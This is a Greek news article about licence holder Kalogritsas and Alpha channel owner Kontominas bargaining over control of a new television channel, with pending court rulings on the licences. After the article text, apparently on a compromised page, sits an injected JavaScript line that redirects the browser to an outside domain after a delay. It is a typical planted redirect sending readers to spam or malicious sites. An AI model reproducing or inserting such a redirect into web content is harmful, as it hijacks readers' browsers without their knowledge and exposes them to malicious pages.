Καλογρίτσας και Κοντομηνάς παζαρεύουν το νέο κανάλι

0
41

Δυο συναντήσεις σε λιγότερο από 24 ώρες είχαν ο «αδειούχος» κ. Καλογρίτσας με τον ιδιοκτήτη του Alpha (αλλά χωρίς άδεια) Δημήτρη Κοντομηνά, αναζητώντας κοινό τόπο για να συνεργαστούν στον τηλεοπτικό χώρο. Πληροφορίες αναφέρουν ότι το κλίμα ήταν πολύ καλό, όμως επί της ουσίας υπήρξαν σοβαρές αποκλίσεις, με σημαντικότερη εκείνη που αφορά στον μελλοντικό έλεγχο του κοινού τηλεοπτικού εγχειρήματος.

Ο κ. Καλογρίτσας φαίνεται να θεωρεί αυτονόητο ότι θα έχει την πλειοψηφία και το μάνατζμεντ του σταθμού, από τη στιγμή που πλειοδότησε στον διαγωνισμό και πρέπει να καταβάλει στο δημόσιο 53,6 εκατ ευρώ μέσα σε δυο χρόνια. Το ίδιο ακριβώς, όμως, θέλει και ο Δημήτρης Κοντομηνάς με το επιχείρημα ότι το κανάλι του είναι πρώτο σε τηλεθέαση και έσοδα, ενώ δεν έχει καθόλου τραπεζικό δανεισμό. Επιπλέον, διαθέτει προηγμένο εξοπλισμό και έτοιμο δυναμικό.

Το επιπλέον στοιχείο είναι ότι ο ιδιοκτήτης του Αlpha δεν έχει βγάλει από το μυαλό του πως μπορεί να κερδίσει, τελικά, άδεια. Και, μάλιστα, σε βάρος του κ. Καλογρίτσα. Πώς; Αν το Συμβούλιο της Επικρατείας κρίνει ως εκπρόθεσμη της κατάθεση της εγγυητικής του επιστολής των τριών εκατ ευρώ με σαραντάλεπτη καθυστέρηση, την παραμονή του διαγωνισμού. Και αν, επίσης, η Δικαιοσύνη κόψει τον πρώτο επιλαχόντα Ιβάν Σαββίδη, λόγω των δηλώσεών του ότι ανέβαζε τεχνητά το τίμημα και όταν έφτανε στη τελική φάση, κατέθετε μηδενική προσφορά.

 

Image result for σαββίδης

Άλλωστε, ο Δημήτρης Κοντομηνάς δεν ξεχνά ότι δεν κατάφερε να πάρει άδεια παρότι ο εκπρόσωπός του προσέφερε 7,5 εκατ ευρώ περισσότερα από τον κ. Καλογρίτσα.

Τι θα γίνει, λοιπόν; Πιθανότατα θα συνεχιστούν οι επαφές τους χωρίς αποτέλεσμα, μέχρις ότου κρίνει το Ανώτατο Δικαστήριο αν ο νόμος του Νίκου Παππά είναι συνταγματικός ή όχι και αν οι τέσσερις προσωρινοί «αδειούχοι» θα είναι και οι οριστικοί.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here